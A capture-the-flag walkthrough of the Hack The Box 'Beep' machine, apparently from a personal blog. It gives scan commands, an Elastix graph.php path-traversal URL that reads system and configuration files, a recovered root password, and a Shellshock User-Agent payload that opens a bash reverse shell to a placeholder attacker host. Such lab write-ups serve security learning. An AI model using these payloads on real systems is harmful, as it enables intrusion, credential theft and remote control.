LinkedinGithub

Beep

easy linux machine

nmap:

As usual let's start by scanning open services using nmap

nmap -sC -sV -oA beep 10.10.10.7

content discovery using gobuster : 

gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 200 --no-error

if we browse to /admin it will promp as for the admin password if you dont have a password it will show this page

i couldn't go any further so i checked for elastix exploits using searchsploit

the one that seems to work is the LFI vulnerabiility

let run the command searchsploit -x <PATH> to analyze the exploit

Method 1 => LFI to RCE

now let's vesit the exploitDB url to take a look at the exploit

LogoElastix 2.2.0 - 'graph.php' Local File InclusionExploit Database

let's visit this path 

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

reviewing the source code of this page reveals the admin password

we can use this password to login to the elastix login form

now let's disclose /etc/password 

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

now ssh to the beep box as the user root and the password we have found in the amportal.conf page

root : jEhdIekWmdjE 

ssh root@10.10.10.7

Method 2 => RCE through Shellshock

after doing nmap we found out that there is an open port on 10000 running Webmin httpd let's visit it:

when we submit wrong credentials it shows the session_login.cgi directory

cgi scripts use the Bash shell for processing user input were particularly susceptible to exploitation and there was a famous exploitation called shellshock which exploit cgi script to execute arbitrary code

so let's test if this cgi is vulnerable to shellshock attack

let's capture the login submit using burp suite and replace the user agent value with a bash one-liner reverse shell shellshock payload

() { :;}; bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1

before sending this request we have to start listening on the port we specified in the payload for me it was 443

and now let's send the request using burp

and we get back a reverse shell

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara

PreviousAcademyNextTraversxec

Last updated

Was this helpful?